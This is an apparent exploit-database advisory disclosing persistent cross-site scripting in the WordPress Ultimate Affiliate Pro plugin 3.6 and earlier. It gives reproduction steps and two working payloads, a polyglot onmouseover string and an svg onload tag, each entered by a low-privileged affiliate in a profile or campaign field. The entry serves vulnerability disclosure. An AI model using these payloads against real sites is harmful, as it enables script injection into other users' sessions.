WordPress Ultimate Affiliate Pro 3.6 Cross Site Scripting

WordPress Ultimate Affiliate Pro plugin versions 3.6 and below suffer from a persistent cross site scripting vulnerability.


MD5 | e78c775ae995bd10eec13327774bc13c

# Exploit Title: Ultimate Affiliate Pro WordPress Plugin <= v3.6 - Authenticated Stored XSS
# Date: 2017-07-24
# Exploit Author: 8bitsec
# Vendor Homepage: http://affiliate.wpindeed.com/
# Software Link: https://codecanyon.net/item/ultimate-affiliate-pro-wordpress-plugin/16527729
# Version: 3.6
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.5]
# Email: [email protected]
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-07-24

Product & Service Introduction:
===============================
Ultimate Affiliate Pro is the newest and most completed Affiliate WordPress Plugin that allow you provide a premium platform for your Affiliates with different rewards and amounts based on Ranks or special Offers.

Technical Details & Description:
================================

Multiple Stored XSS vulnerabilities found logged as a low privileged user.

Proof of Concept (PoC):
=======================

Authenticated Stored XSS:

Logged as an affiliate, a low privileged user. Profile > Edit Account.
Write the payload in the 'Last Name' input area:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNMouseoVer=alert(document.domain) )

Other fields may be vulnerable.

Authenticated Stored XSS:

Logged as an affiliate, a low privileged user.
Marketing > Campaigns > Add New Campaign. Write the payload on the 'Name' input field:
<svg/onload=alert(document.domain)>

Credits & Authors:
==================
8bitsec - [https://twitter.com/_8bitsec]

Related Posts